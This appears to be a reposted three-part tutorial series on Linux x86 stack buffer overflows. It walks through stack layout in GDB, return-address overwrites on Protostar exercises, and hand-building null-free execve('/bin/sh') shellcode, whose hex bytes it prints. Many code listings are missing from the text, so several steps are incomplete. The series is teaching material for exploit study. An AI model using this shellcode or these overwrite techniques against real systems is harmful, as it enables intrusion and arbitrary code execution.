Linux Buffer Overflows x86 – Part 3 (Shellcoding)

( Original text by SubZero0x9 )

Hello guys, this is the part 3 of the Linux buffer Overflows x86. In this part we will learn what is shellcode, why do we use it and how do we use it. In the previous two blogs, we learnt about process memory, stack region, stack operations, stack registers, attempting buffer overflow, overwriting buffer, modifying return address, manipulating program flow and program execution.
If you have not read the first two blogs, here are the links Part1 and Part2.

The main purpose behind exploiting Buffer Overflow is to spawn a reverse shell or execute arbitrary commands at least. Even if we find a vulnerable binary with stack overflow and are able to overwrite the return address, we still have to tell the binary to execute commands on our behalf. But how do we do that? Suppose we want to spawn a shell of a vulnerable binary, but the code to spawn a shell is not present in the binary. So, even if we control the flow of the binary we really can’t modify the return address to a memory address which can execute the code which spawns a shell. We saw in the previous two blogs, we were able to overwrite the buffer with any arbitrary data. This means, when the program is loaded into memory all the operations are carried out on the stack. Any user input accepted will be stored on the stack and if the program accepts malicious input (remember insufficient bound checking) it also gets stored on the stack. So instead of placing random data, if we place the code which we want to execute on to the stack it will give us the results.
Simple Right? NO !!

We can’t simply go ahead and paste the code of spawning a shell onto the buffer, because when the program is running it is loaded into the system memory and it communicates with the processor for carrying out the operations through syscalls which is understood by kernel who actually communicates with the processor to get things done(well this is a simplified statement, the actual process is too complex). Now the processor doesn’t understand C,C++, JAVA, Python, etc. it only understands the machine code which it can directly execute. And We, human beings can’t understand machine code so we write programs in high level languages. Also, machine code is mostly regarded as the lowest level representation of compiled code. Another main reason we use machine code is because of the size. The space available in the stack for operations are very limited and machines codes are really compact in that sense.

SHELLCODE

So till now it is pretty clear that the code or payload used to exploit the buffer overflow vulnerability to execute arbitrary commands is called Shellcode. Its name is derived from the fact that it was initially used to spawn a root shell. Shellcode is basically a set of machine code or set of instructions injected into the buffer of the vulnerable program. The vulnerable program then executes the shellcode.

Shellcodes are machine codes. Basically, we write a set of instructions in a high level language or assembly language then convert into hexadecimal values (these values are just a bunch of opcodes and operands understood by the processor).

We cannot run shellcode directly, instead it needs a some sort of carrier (buffer, file, process, environment variables, etc) which will be read or executed by the vulnerable software. There are many shellcode execution strategies which are used depending on the exploitability and constraints of the vulnerable software.

Shellcodes are written mainly to force the program to do actions on the behalf of the attacker. The attacker can write a specific function which will do the intended action once loaded into the same address space of the vulnerable software. Every action (well almost) in an operating system is done by calling a syscall or system calls. The shellcode will also contain a syscall for a specific action which the attacker needs to perform. Syscalls are the most important thing in the shellcode as you can force the program to perform action just by triggering a syscall.

SYSCALLS

According to wikipedia, “In computing, a system call is the programmatic way in which a computer program requests a service from the kernel of the operating system it is executed on. ”

Linux’s security mechanism (the ring model) is divided into two spaces : User Space and Kernel space. Eevery process running in the userspace has its own virtual address space and cannot access any other processes address space until explicitly allowed. When the process in the userspace wants to access the kernel space to execute some operations, it cannot directly access it. No processes in the userspace can access the kernel space.

When an userspace process tries to access the kernel, an exception is raised and prevents the process from accessing the kernel space. The userspace processes uses the syscalls to communicate with the kernel processes to carry out the operations.

Syscalls are a bunch of functions which gives a userland process direct access to the kernel space to carryout low level functions. In simpler words, Syscalls are an interface between user mode and kernel mode.

In Linux, syscalls are generated using the software interrupt instruction, int 0x80. So, when a process in the user mode executes the int 0x80 instruction, the flow is transferred from the user mode to kernel mode by the CPU and the syscall is executed. Other than syscalls, there are standard library functions like the libc (which is extensively used in the linux OS). These standard library functions also call the syscall in some way or another (not everytime though). But we wont look into that as we are not going to use library functions in our shellcode. Also, using syscall is much nicer because there is no linking involved with any library as needed in other programming languages.

Note: The software interrupt int 0x80 was proving to be slower on the Pentium processors, so Linus introduced two new alternative namely SYSENTER/SYSEXIT instructions which were provided by all Pentium II+ processors. We will use the int 0x80 instruction in our shellcode however.

HOW TO USE SYSCALLS

When a process is in the userspace and the syscall instruction is executed, the interrupt handler i.e the software interrupt int 0x80 tells the CPU to change the execution from user mode to kernel mode. Now the system call handler is notified to call the routine which the userland process wanted. All the syscalls are stored in a syscall table, it is a big array which points to the memory address of the syscall routines. When the syscall is called, the syscall number is loaded into EAX register, this is how the system call handler comes to know which system call routine to execute. Keep in mind that the execution done here is carried out on the Kernel space stack and after the execution the control is given back to the userspace process and the remaining operation is carried out on userspace stack.

Here is the list of all the syscalls (x86):- http://syscalls.kernelgrok.com/

Each syscall is assigned a syscall number (an integer value) for basic naming convention. Every syscall has arguments which are necessary to execute the related operations. The syscall number is stored in the EAX register and the arguments are stored in the EBX , ECX , EDX , ESI and EDI respectively.

All the linux syscalls are well documented with instructions of how to implement them in your program. Usually we can use the syscall in normal C program or we can go ahead and do the same in an assembly language. Since we are writing our own shellcode, we have to dip our hands in the world of assembly language.

So what we will do is, write a C program with the syscall, disassemble the program, see the assembly instructions, write the assembly equivalent, make the necessary changes and extract the shellcode. Now we could have done this in assembly language directly but for getting the whole idea of how a program works from the high level to low level I am choosing this path.

Basic Assembly knowledge is needed for this, if you are new to Assembly then you can read the Assembly and Shellcoding blog series by my friend SLAER.

SPAWNING A SHELL

Lets write a shellcode for spawning a shell. We will use execve syscall for this operation.

First, lets take a look at the man page for execve..

The whole function looks like this:-

Here, filename is the command or program which we want to execute, in our case “/bin/sh”. Argv is an array of the argument string passed to the new program and it should contain the filename in its first index. Envp array can be NULL. Also the argvand envp array must end with a NULL.

We will initiate a char array spawnshell[2], with spawnshell[0]= “/bin/sh” and the next index being NULL i.e spawnshell[1]=NULL. We declared the last index as NULL because argv must end with a NULL byte.

So, execve will look like:

The C code for spawning a shell :

Compiling the program:

(We used static flag while compiling to prevent the dynamic linking as we want to disassemble the execve function.)

Running the executable we get a shell.

Lets disassemble the main function in our favorite GDB:

Here, the execve is called from the libc library, because we wrote a C program and used stdlib. Before calling the execve() function, the arguments required by it are stored on the stack. We will see the important instructions in detail:

sub $0x14, %esp -> Subtracting 14 from ESP, this is how the space is allocated on the stack.

1) movl $0x80bb868,-0x14(%ebp) -> Moving the memory address 0x80bb868 which contains “/bin/sh” on the stack. (You can see the value by using the command x/1s 0x80bb868 in GDB)

2) movl $0x0,-0x10(%ebp) -> Moving 0 on the stack at -0x10(%ebp), means the NULL byte after the “/bin/sh”.

3) mov -0x14(%ebp),%eax -> EAX now has the “/bin/sh”.

4) push $0x0 -> 0 is pushed onto the stack.

5) lea -0x14(%ebp),%edx -> The effective address of -0x14(%ebp) is loaded into EDX i.e EDX is pointing to the pointer of “/bin/sh”.

6) push %edx -> Pushing the value of EDX on the stack.

7) push %eax -> Pushing the value of EAX on the stack.

8)call 0x806c990 <execve> -> calling the function execve.

So what does this mean? Every numbered points are explained below in the same manner:-

1) filename = “/bin/sh”

2) filename = “/bin/sh” followed by NULL

3) argv[0]= “/bin/sh”

4) 0 is pushed for the envp

5) pointing to the pointer of “/bin/sh” i.e argv

6) EDX=argv

7) EAX= filename

8) execve function is called

Now the execve function according to the arguments pushed onto the stack will look like:-

execve(EAX, EDX,0)

So, now we know what to do with the assembly instructions. Lets write an assembly program for execve syscall.

Lets look at the execve syscall w.r.t assembly instructions:

Assembly program:-

Assemble this program:

Link this program:

Running the program we can see we get a shell.

Now, we want to extract the opcodes from the executable to form our shellcode. We will use objdump utility to display the object file.

Here, we can see in the right side, the assembly instructions that we wrote and in the left side opcodes for those instructions. Now we just have to copy these opcodes and execute it from C program which will act as a carrier for our shellcode.

Our Shellcode now is:

“\xc7\x05\xa8\x90\x04\x08\xa0\x90\x04\x08\xb8\x0b\x00\x00\x00\xbb\xa0\x90\x04\x08\xb9\xa8\x90\x04\x08\xba\xac\x90\x04\x08\xcd\x80\xb8\x01\x00\x00\x00\xbb\x0a\x00\x00\x00\xcd\x80”

As we already know we cannot execute shellcode directly, we will be needing a program to execute it for us. Shellcode is always loaded into the virtual address space of the target process which we want to exploit. Shellcode cant have its own process space as it cant be executed directly and it doesn’t makes sense to load the shellcode in any other address space other than the vulnerable software.

Just for demonstration we will load the shellcode in the address space of our own program and see whether it gets executed or not.

We will write a small C program which will execute our shellcode:

So, whats the program doing?

First, we are defining a char array shellcode with our actual shellcode in it. Then, in the main() function we are defining a variable ret which is an int pointer.

Then we are making the ret variable point to an address which is 8 bytes (2 int value)from its own address.

Remember this will happen on the stack, and the addresses on the stack moves from higher order memory to the lower order memory. So, by adding 8 bytes to the address of ret variable we are actually making it points towards the main()function.

Then we are assigning the address of our shellcode array to the address of the retvariable which is pointing to the address of main. So before the program ends it will execute our shellcode.

Lets compile the program:

Running the program we get Segmentation fault (core dumped)

So, we can see that our shellcode didn’t work. Lets take a look at what is wrong with our shellcode.

We can see there are a bunch of NULL bytes in the opcodes i.e ‘00’. Now one important thing, mostly the shellcode is loaded into the user input buffer and mostly it will be a char buffer or string buffer. If a NULL value occurs in the string, it terminates the string right there and doesn’t accept anything after the NULL termination. So our shellcode containing NULL values wont work. So we have to find a way to eliminate the NULL values.

Also, we are using hardcoded addresses in our shellcode. As we can see the mov instructions, all those addresses are machine specific hardcoded addresses. It is highly likely that it might not work in different versions of linux. So we have to deal with that also. One thing we can do is somehow load the starting address of our shellcode in the memory and using that reference we can make the necessary operations relative to this address. Now this is called as relative addressing. We will see this later in more detail.

Now the important part is to modify the assembly code with the two requirements mentioned above, getting rid of the NULL values and implementing relative addressing for avoiding hardcoded addresses .

REFINING THE SHELLCODE

So lets start…

From the above assembly program we know what instructions are needed to create our shellcode. In the above program we defined an ASCII string with “/bin/sh” and assigned the address of the string to another variable which will act as the pointer. But in the shellcode we will get the memory address of that variable and it will not work around different linux machines as the address may differ.

So in the manpages of the execve syscall it is clearly stated that, “The argv and envp arrays must each include a null pointer at the end of the array.” In our case envparray is already NULL, but the filename i.e the first index of argv pointer should also end with a NULL value. In the above assembly program we were defining separate variables for each argument of the syscall, but now we cant do that.

The execve syscall has three char pointer arguments. For the first argument we will have “/bin/shA”. We are appending A because we directly cant add a NULL value as it will hamper our shellcode, instead we will assign the index of A, a null value from the register. For the next char argument we will append four B’s as char is 4 bytes. Now the second argument is a pointer to the start of the address of the filename. Here we will assign the index of the starting B with the address of the starting memory address of filename. The third argument is the envp array which is a NULL pointer and we will append it with four C’s and then we will assign the index of the first C with a null value.

The representation of execve syscall arguments w.r.t registers will be like:

int execve(EBX, ECX, EDX); and the execve syscall number 11 will be loaded in the EAX register.

Below is the representation of the string which we will load along with the index in hex.

Lets take a look into the final assembly program for our shellcode.

Refined assembly program for Shellcode:

Now I will explain in detail what we have done.

-> We are starting our shellcode with a jmp instruction. jmp instruction will make an unconditional jump to the specified memory location. It will skip the actual shellcode and directly jump to the ShellcodeCall memory address.

-> In there the call instruction is executed which will directly point our Shellcode. Now what happens here is the most important thing. When the call instruction is executed the next instruction or memory address which contains the string “/bin/shABBBBCCCC” is pushed onto the top of the stack as the ret address. This is how we implement relative addressing.

->Now the pop instruction is executed. So the pop instruction will load the retaddress which has the string in the ESI register. The ESI register has the memory location which points to “/bin/shABBBBCCCC”. ESI register will be the reference point for all the operation which we will perform so the issue of hardcoded addresses will be resolved.

->Next we are XORing the EAX register to avoid the NULL bytes. We are basically resetting the EAX register without assigning a NULL value.

->Then we are loading the value 0 from the AL register (As we all know the ALregister is the lower part of the EAX address which is already 0 after the XORing) to the 7th index of the ESI register which will replace the A in our string with a null value.

-> Then we are loading the value of ESI i.e the start address of our string into the 8th index of ESI register replacing the B’s in our string.

->Then we are loading 0 from the AL register into the 12th index of our ESI register i.e replacing the C’s with 0’s.

-> Then we are loading the arguments of execve into the EBXECX and EDXregisters.

->Then we are loading the execve syscall number 11 into AL register again avoiding the NULL bytes because the higher part of the EAX register holds 0.

-> Lastly we make a software interrupt which will execute the syscall.

Now lets take a look at the opcodes after assembling and linking the assembly program.

As we can see there are no null bytes and the hardcoded addresses are also solved.

Now lets copy our shellcode into the C program which we wrote earlier to check whether our shellcode executes or not.

Lets run the compiled C program binary and see if it works.

VOILA !!!

We successfully spawned a shell with our own shellcode.

This was a very basic example of writing a working shellcode. Now there are many situations where you want take a reverse shell over the network and you have to write a shellcode for that. That would be a really challenging task to write a shellcode of that manner. This blog post only introduced what a shellcode looks like and how much pain you have to take to write a simple working shellcode.

In the next part, we will exploit a vulnerable binary and execute shellcode on that.

If you have any doubts or opinions, kindly express yourselves in the comment section. Thanks !!!

Реклама

Linux Buffer Overflows x86 Part 2 ( Overwriting and manipulating the RETURN address)

( Original text by SubZero0x9 )

Hello Friends, this is the 2nd part of the Linux x86 Buffer Overflows. First of all I want to apologize for such a long delay after the First blog of this series, there were personal and professional issues going on in my life (Well who hasn’t got them? Meh?).

In the previous part we learned about the Process Memory, Stack Region, Stack Operations, Stack Registers, Attempting Buffer Overflow, Overwriting Buffer, ESP and EIP. In case you missed it, here is the link to the Part 1:

https://movaxbx.ru/2018/11/06/getting-started-with-linux-buffer-overflows-x86-part-1-introduction/

Quick Recap to the Part 1:

-> We successfully exploited the insufficient bound checking by giving input which was larger than the buffer size, which led to the overflow.

-> We successfully attempted to overwrite the buffer and the EIP (Instruction Pointer).

-> We used GDB debugger to examine the buffer for our input and where it was placed on the stack.

Till now, we already know how to attempt a buffer overflow on a vulnerable binary. We already have the control of EIP and ESP.

So, Whats Next ?

Till now we have only overwritten the buffer. We haven’t really exploit anything yet. You may have read articles or PoC where Buffer Overflow is used to escalate privileges or it is used to get a reverse shell over the network from a vulnerable HTTP Server. Buffer Overflow is mainly used to execute arbitrary commands on the vulnerable system.

So, we will try to execute arbitrary commands by using this exploit technique.

In this blog, we will mainly focus on how to overwrite the return address to manipulate the flow of control and program execution.

Lets see this in more detail….

We will use a simple program to manipulate its intended output by changing the RETURN address.

(The following example is same as the AlephOne’s famous article on Stack Smashing with some modifications for a better and easy understanding)

Program:

 

This is a very simple program where the variable random is assigned a value ‘0’, then a function named function is called, the flow is transferred to the function()and it returns to the main() after executing its instructions. Then the variable random is assigned a value ‘1’ and then the current value of random is printed on the screen.

Simple program, we already know its output i.e 1.

But, what if we want to skip the instruction random=1; ?

That means, when the function() call returns to the main(), it will not perform the assignment of value ‘1’ to random and directly print the value of random as ‘0’.

So how can we achieve this?

Lets fire up GDB and see how the stack looks like for this program.

(I won’t be explaining each and every instruction, I have already done this in the previous blog. I will only go through the instructions which are important to us. For better understanding of how the stack is setup, refer to the previous blog.)

In GDB, first we disassemble the main function and look where the flow of the program is returned to main() after the function() call is over and also the address where the assignment of value ‘1’ to random takes place.

-> At the address 0x08048430, we can see the value ‘0’ is assigned to random.

-> Then at the address 0x08048437 the function() is called and the flow is redirected to the actual place where the function() resides in memory at 0x804840b address.

-> After the execution of function() is complete, it returns the flow to the main()and the next instruction which gets executed is the assignment of value ‘1’ to random which is at address 0x0804843c.

->If we want to skip past the instruction random=1; then we have to redirect the flow of program from 0x08048437 to 0x08048443. i.e after the completion of function() the EIP should point to 0x08048443 instead of 0x0804843c.

To achieve this, we will make some slight modifications to the function(), so that the return address should point to the instruction which directly prints the randomvariable as ‘0’.

Lets take a look at the execution of the function() and see where the EIP points.

-> As of now there is only a char array of 5 bytes inside the function(). So, nothing important is going on in this function call.

-> We set a breakpoint at function() and step through each instruction to see what the EIP points after the function() is exectued completely.

-> Through the command info regsiters eip we can see the EIP is pointing to the address 0x0804843c which is nothing but the instruction random=1;

Lets make this happen!!!

From the previous blog, we came to know about the stack layout. We can see how the top of the stack is aligned, 8 bytes for the buffer, 4 bytes for the EBP, 4 bytes for the RET address and so on (If there is a value passed as parameter in a function then it gets pushed first onto the stack when the function is called).

-> When the function() is called, first the RET address gets pushed onto the stack so the program flow can be maintained after the execution of function().

->Then the EBP gets pushed onto the stack, so the EBP can act as the offset reference point for other instructions to access and calculate the memory addresses.

-> We have char array buffer of 5 bytes, but the memory is allocated in terms of WORD. Basically 1 word=4 bytes. Even if you declare a variable or array of 2 bytes it will be allocated as 4 bytes or 1 word. So, here 5 bytes=2 words i.e 8 bytes.

-> So, in our case when inside the function(), the stack will probably be setup as buffer + EBP + RET

-> Now we know that after 12 bytes, the flow of the program will return to main()and the instruction random = 1; will be executed. We want to skip past this instruction by manipulating the RET address to somehow point to the address after 0x0804843c.

->We will now try to manipulate the RET address by doing something like below :-

 

Here, we are introducing an int pointer ret, and we are assigning it the starting address of buffer + 12 .i.e (wait lets see this in a diagram)

-> So, the ret pointer now ends exactly at the start where the return value is actually stored. Now, we just want to add ret pointer with some value which will change the return value in such a manner that it will skip past the return = 1;instruction.

Lets just go back to the disassembled main function and calculate how much we have to add to the ret pointer to actually skip past the assignment instruction.

-> So, we already know we want to skip pass the instruction at address 0x0804843c to address 0x08048443. By subtracting these two address we get 7. So we will add 7 to the return address so that it will point to the instruction at address 0x08048443.

-> And now we will add 7 to the ret pointer.

 

So our final code should look like:

 

So, now we will compile our code.

 

Since we are adding code and re-compiling the program, the memory addresses will get changed.

Lets take a look at the new memory addresses.

-> Now the assignment instruction random = 1; is at address 0x08048452 and the next address which we want the return address to point is 0x08048459. The difference between these addresses is still 7. So we are good till now.

Hopefully by executing this we will get the output as “The value of random is: 0”

HOLY HELL!!!

Why did it gave the Segmentation fault (core dumped)? That means maybe the process is trying to access a memory that doesn’t exist or something.

Note:- Well this was really tricky for me atleast. Computers works in mysterious ways, it is not just mathematics, numbers and science ( Yeah I am being dramatic)

Lets fire up our binary in GDB and see whats wrong.

-> As you can see we set a breakpoint at line 4 and run the program. The breakpoint hits and the program halts. Then we examine the stack top and what we see, the distance between the start of the buffer and the start of return address is not 12, its 13. (It doesn’t even make sense mathematically). Three full block adds up for 12 bytes (4 bytes each) and 1 byte for that ‘A’ i.e 41.

-> Our buffer had value “ABCDE” in it. And A in ASCII hex is 41. From 41 to just right before of the return address 0x08048452, the count is 13 which traditionally is not correct. I still don’t know why the difference is 13 instead of 12, if anyone knows kindly tell me in the comments section.

-> So we just change our code from ret = buffer + 12; to ret = buffer + 13;

Now the final code will look like this:

 

Now, we re-compile it and run and hope its now going to give a desired output.

Before continuing lets see this again in GDB:

> So, we can see now after 7 is added to the ret pointer, the return address is now 0x08048459 which means we have successfully skipped past the assignment instruction and overwritten the return address to manipulate our way around the program flow to alter the program execution.

Till now we learnt a very important part of buffer overflow i.e how to manipulate and overwrite the return address to alter the program execution flow.

Now, lets another example where we can overwrite the return address in more similar ‘buffer overflow’ fashion.

We will use the program from protostar buffer overflow series. You can find more about it here: https://exploit-exercises.com/protostar/

 

Small overview of a program:-

->There is a function win() which has some message saying “code flow successfully changed”. So we assume this is the goal.
-> Then there is the main(), int pointer fp is declared and defined to ‘0’ along with char array buffer with size 64. The program asks for user input using the getsfunction and the input is stored in the array buffer.
-> Then there is an if statement where if fp is not equal to zero then it calls the function pointer jumping to some memory location.

Now we already know that gets function is vulnerable to buffer overflow (visit previous blog) and we have to execute the win() function. So by not wasting time lets find out the where the overflow happens.

First we will compile the code:

 

We know that the char array buffer is of 64 bytes. So lets feed input accordingly.

So, as we can see after the 64th byte the overflow occurs and the 65th ‘A’ i.e 41 in ASCII Hex is overwriting the EIP.

Lets confirm this in GDB:

-> As we see the buffer gets overflowed and the EIP is overwritten with ‘A’ i.e 41.

Now lets find the address of the win() function. We can find this with GDB or by objdump.

Objdump is a tool which is used to display information about object files. It comes with almost every Linux distribution.

The -d switch stands for disassemble. When we use this, every function used in a binary is listed, but we just wanted the address of win() function so we just used grep to find our required string in the output.

So it tells us that the win() function’s starting address is 0804846b. To achieve our goal we just have to pass this address after the 64th byte so that the EIP will get overwritten by this address and execute the win() function for us.

But since our machine is little endian (Find more about it here)we have to pass the address in a slightly different manner (basically in reverse). So the address 0804846b will become \x6b\x84\x04\x08 where the \x stands for HEX value.

Now lets just form our input:

As we can see the win() function is successfully executed. The EIP is also pointing the address of win().

Hence, we have successfully overwritten the return address and exploited the buffer overflow vulnerability.

Thats all for this blog. I am sorry but this blog also went quite long, but I will try to keep the next blog much shorter. And also, in the next blog we will try to play with shellcode.

 

 

Getting Started with Linux Buffer Overflows x86 – Part 1 (Introduction)

( Original text by SubZero0x9 )

Hello Friends, this series of blog posts will purely focus on Buffer Overflows. When I started my journey in Infosec, this one topic fascinated me as much as it frightened me. When I read some of the blogs related to Buffer Overflows, it really seemed as some High-level gibber jabber containing C code, Assembly and some black terminals (Yeah I am talking about GDB). Over the period of time and preparing for OSCP, I started to learn about Buffer Overflows in detail referring to the endless materials on Web scattered over different planets. So, I will try to explain Buffer Overflow in depth and detail so everyone reading this blog can understand what actually a Buffer Overflow is.

In this blog, we will understand the basic fundamentals behind the Buffer Overflow vulnerability. Buffer Overflow is a memory corruption attack which involves memory, stack, buffers to name a few. We will go through each of this and understand why really Buffer Overflows takes place in the first place. We will focus on 32-bit architecture.

A little heads up: This blog is going to be a lengthy one because to understand the concepts of Buffer Overflow, we have to understand the process memory, stack, stack operations, assembly language and how to use a debugger. I will try to explain as much as I can. So I strongly suggest to stick till the end and it will surely clear your concepts. Also, from the next blog I will try to keep it short :p :p

So lets get started….
Before getting to stack and buffers, it is really important to understand the Process Memory Organization. Process Memory is the main playground where it all happens. In theory, the Process memory where the program/process resides is quite a complex place. We will see the basic part which we need for Buffer Overflow. It consists of three main regions: Text, Data and Stack.

Text: The Text region contains the Program Code (basically instructions) of the executable or the process which will be executed. The Text area is marked as read-only and writing any data to this area will result into Segmentation Violation (Memory Protection Mechanism).

Data: The Data region consists of the variables which are declared inside the program. This area has both initialized (data defined while coding) and uninitialized (data declared while coding) data. Static variables are stored in this section.

Stack: While executing a program, there are many function and procedure calls along with many JUMP instructions which after the functions work is done has to return to its next intended place. To carry out this operation, to execute a program, the memory has an area called Stack. Whenever the CALL instruction is used to call a function, the stack is used. The Stack is basically a data structure which works on the LIFO (Last In First Out) principle. That means the last object entering the stack is the first object to get out. We will see how a stack works in detail below.

To understand more about the Process Memory read this fantastic article: https://www.bottomupcs.com/elements_of_a_process.xhtml

So Lets see an Assembly Code Skeleton to understand more about how the program is executed in Process Memory.


Here, as we can see the assembly program skeleton has three sections: .data, .bss and .txt

-> .txt section contains the assembly code instructions which resides in the Text section of the process memory.

-> .data section contains the initialized data or lets say defined variables or data types which resides in the Data section of the process memory.

-> .bss section contains the uninitialized data or lets say declared variables that will be used later in the program execution which also resides in the Data section of the process memory

However in a traditionally compiled program there may be many sections other than this.

Now the most important part….

HOLY STACK!!!

As we discussed earlier all the dirty work is done on the Stack. Stack is nothing but a region of memory where data is temporarily stored to carry out some operations. There are mainly two operations performed by stack: PUSH and POPPUSH is used to add the object on top of the stack, POP is used to remove the object from top of the stack.

But why stack is used in the first place?

Most of the programs have functions and procedures in them. So during the program execution flow, when the function is called, the flow of control is passed to the stack. That means when the function is called, all the operations which will take place inside the function will be carried out on the Stack. Now, when we talk about flow of control, after when the execution of the function is done, the stack has to return the flow of control to the next instruction after which the function was called in the program. This is a very important feature of the stack.

So, lets see how the Stack works. But before that, lets get familiar with some stack pointers and registers which actually carries out everything on the Stack.

ESP (Extended Stack Pointer): ESP is a stack register which points to the top of the stack.

EBP (Extended Base Pointer): EBP is a stack register which points to the top of the current frame when a function is called. EBP generally points to the return address. EBP is really essential in the stack operations because when the function is called, function arguments and local variables are stored onto the stack. As the stack grows the offset of both the function arguments and variables changes with respect to ESP. So ESP is changed many times and it is difficult for the compiler to keep track, hence EBP was introduced. When the function is called, the value of ESP is copied into EBP, thus making EBP the offset reference point for other instructions to access and calculate the memory addresses.

EIP (Extended Instruction Pointer): EIP is a stack register which tells the processor about the address of the next instruction to execute.

RET (return) address: Return address is basically the address to which the flow of control has to be passed after the stack operation is finished.

Stack Frame: A stack frame is a region on stack which contains all the function parameters, local variables, return address, value of instruction pointer at the time of a function call.

Okay, so now lets see the stack closely by executing a C program. For this blog post we will be using the program challenge ‘stack0’ from Protostar exploit series, which is a stack based buffer overflow challenge series.
You can find more about Protostar exploit series here -> https://exploit-exercises.com/protostar/

The program:

Whats the program about ?
An int variable modified is declared and a char array buffer of 64 bytes is declared. Then modified is set to 0 and user input is accepted in buffer using gets() function. The value of modified is checked, if its anything other than 0 then the message “you have changed the ‘modified’ variable” will be printed or else “Try again?” will be printed.

Lets execute the program once and see what happens.

So after executing the program, it asks for user input, after giving the string “IamGrooooot” it displays “Try again?”. By seeing the output it is clear that modified variable is still 0.

Now lets try to debug this executable in a debugger, we will be using GDB throughout this blogpost series (Why? Because its freaking awesome).

Just type gdb ./executable_name to execute the program in the debugger.

The first thing we do after firing up gdb is disassembling the main() function of our program.

We can see the main() function now, its in assembly language. So lets try to understand what actually this means.

From the address 0x080483f4 the main() function is getting started.
-> Since there is no arguments passed in the main function, directly the EBP is pushed on the stack.
As we know EBP is the base pointer on the stack, the Stack pushes some starting address onto the EBP and saves it for later purposes.

-> Next, the value of ESP is moved into EBP. The value of ESP is saved into EBP. This is done so that most of the operations carried out by the function arguments and the variable changes the ESP and it is difficult for the compiler to keep track of all the changes in ESP.

-> Many times the compiler add some instructions for better alignment of the stack. The instruction at the address 0x080483f7 is masking the ESP and adding some trailing zeros to the ESP. This instruction is not important to us.

-> The next instruction at address 0x080483fa is subtracting 0x60 hex value from the ESP. Now the ESP is pointing to a far lower address from the EBP(As we know the stack grows down the memory). This gap between the ESP and EBP is basically the Stack frame, where the operations needed to execute the program is done.

-> Now the instruction at address 0x080483fd is from where all our C code will make sense. Here we can see the instruction movl $0x0,0x5c(%esp) where the value 0 is moved into ESP + the offset 0x5c, that means 0 is moved to the address [ESP+0x5c]. This is same as in our program, modified=0.

-> From address 0x08048405 to 0x0804840c are the instructions with accepts the user input.
The instruction lea 0x1c(%esp),%eax is loading the effective address i.e [ESP+0x1c] into EAX register. This address is pointing to the char array buffer on the stack. The lea and mov instructions are almost same, the only difference is the leainstruction copies the address of the register and offset into the destination instead of the content(which the mov instruction does).

-> The instruction mov %eax,(%esp) is copying the address stored in EAX register into ESP. So the top of the stack is pointing to the address 0x1c(%esp). Another important thing is that the function parameters are stored in the ESP. Assuming that the next instruction is calling gets function, the gets function will write the data to a char array. In this case the ESP is pointing to the address of the char buffer and the gets function writes the data to ESP(i.e the char array at the address 0x1c(%esp) ).

-> From the address 0x08048411 to 0x0804842e, the if condition is carried out. The instruction mov 0x5c(%esp),%eax is copying the value of modified variable i.e 0 into EAX. Then the test instruction is checking whether the value of modifiedis changed or not. If the value is not changed i.e the je instruction’s output is equal then the flow of control will jump to 0x08048427 where the message “Try again?” will be printed. If the value is changed then flow of control will be normal and the next instruction will be executed, thus printing the message “you have changed the ‘modified’ variable”.

-> Now all the opertions are done. But the stack is as it is and for the program to be completed the flow control has to be passed to the RET address which is stored on the stack. But till now only variables and addresses has been pushed on the stack but nothing has been popped. At the address 0x08048433 the leave instruction is executed. The leave instruction is used to “free” the stack frame. If we see the disassemble main() the first two instructions push %ebp and push %esp,%ebp, these instructions basically sets up the stack frame. Now the leave instruction does exactly the opposite of what the first two instructions did, mov %ebp,%esp and pop %ebp. So these two instructions free ups stack frame and the EIP points to the RET address which will give the flow of control to the address which was next after the called function. In this case the RET value is not pointing to anything because our program ends here.

So till now we have seen what our C code in Assembly means, it is really important to understand these things because when we debug or lets say Reverse Engineer some binary and stuff, this understanding of how closely the memory and stack works really comes in handy.

Now we will see the stack operations in GDB. For those who will be doing debugging and reversing for the first time it may feel overwhelming seeing all these instructions(believe me, I used to go nuts sometimes), so for the moment we will focus only on the part which is required for this series to understand, like where is our input being written, how the memory addresses can be overwritten and all those stuffs….

Here comes the mighty GDB !!!!

In GDB we will list the program, so we can know where we want to set a breakpoint.

We will set the breakpoint for line number 7,11,13Lets run it in GDB..-> After we run it in GDB, we can see the breakpoints which we set is now hit, basically it is interrupting the program execution and halting the program flow at the given breakpoint.

-> We step to next instruction by typing s in the prompt, we can again see the next breakpoint gets hit.

-> At this point we check both our stack registers ESP and EIP. We look these two registers in two different ways. We check the ESP using the x switch which is for examine memory. We can see the ESP is pointing to the stack address 0xbffff0b0and the value it contains is 0x00000000 i.e 0. We can easily assume that, this 0 is the same 0 which gets assigned to the modified variable.

-> We check the EIP by the command info registers eip (you can see info about all the registers by simply typing info registers). We see the EIP is pointing to the memory address 0x8048405 which is nothing but the address of next instruction to be executed.

Now we step next and see what happens.-> When we step through the next instruction it asks us for the input. Now we give the input as random sets of ‘A’ and then we can see our third breakpoint which we set earlier is hit.

-> We again check the ESP and EIP. We clearly see the ESP is changed and pointing to different stack address. EIP now is pointing to the next instruction which is going to be executed.

Now lets see, the input which we gave where does it goes?-> By using the examine memory switch i.e x we see the contents of ESP. We are viewing the 24 words of content on the stack in Hex (thats why x/24xw $esp). We can see our input ‘A’ that is 41 in hex (according to the ASCII standards) on the stack(highlighted portion). So we can see that our input is being written on the stack.

Again lets step through the next instruction.-> In the previous step we saw that the instruction if(modified !=0) is going to be executed. Now lets go back to the section where we saw the assembly instructions equivalent of the C program in detail. We can see the instruction test %eax,%eaxwill be executed. So we already know it will compare if the modified value has changed or not.

How do we see that ?

-> We simply check the EAX register by typing info registers eax. We can see that the value of EAX is 0x0 i.e 0, that means the value of modified variable is still 0. Now we know that the message “Try again?” is going to be printed. The EIP also confirms this, the output of EIP points to 0x8048427 which if you look at the disassembled main function, you can see that it is calling the second puts function which has the message “Try again?”.

Lets step and move towards the exit of the program.-> When we step through the next instruction, it gives us the message “Try again?”. Then we check the EIP it points to 0x8048433, which is nothing but the leaveinstruction. Again we step through, we can the program exiting and terminated with the exit system call that is in the libc.s0.6 shared library files.

WOAH!!!!!

Till now, we saw the how the process memory works, how the programs gets loaded into the memory and how the stack operations are done when the program gets executed. Now this was more than enough to understand what Buffer Overflow really is.

BUFFER OVERFLOW

Finally we can get started with the topic. Lets ask ourselves two very simple questions:

What is a Buffer?
-> Buffer is a temporary storage place in memory to store data.

What is Buffer Overflow?
-> When a data written to a buffer that is larger than the actual buffer size and due to improper bounds checking it gets overflowed and overwrites the adjacent memory addresses/locations.

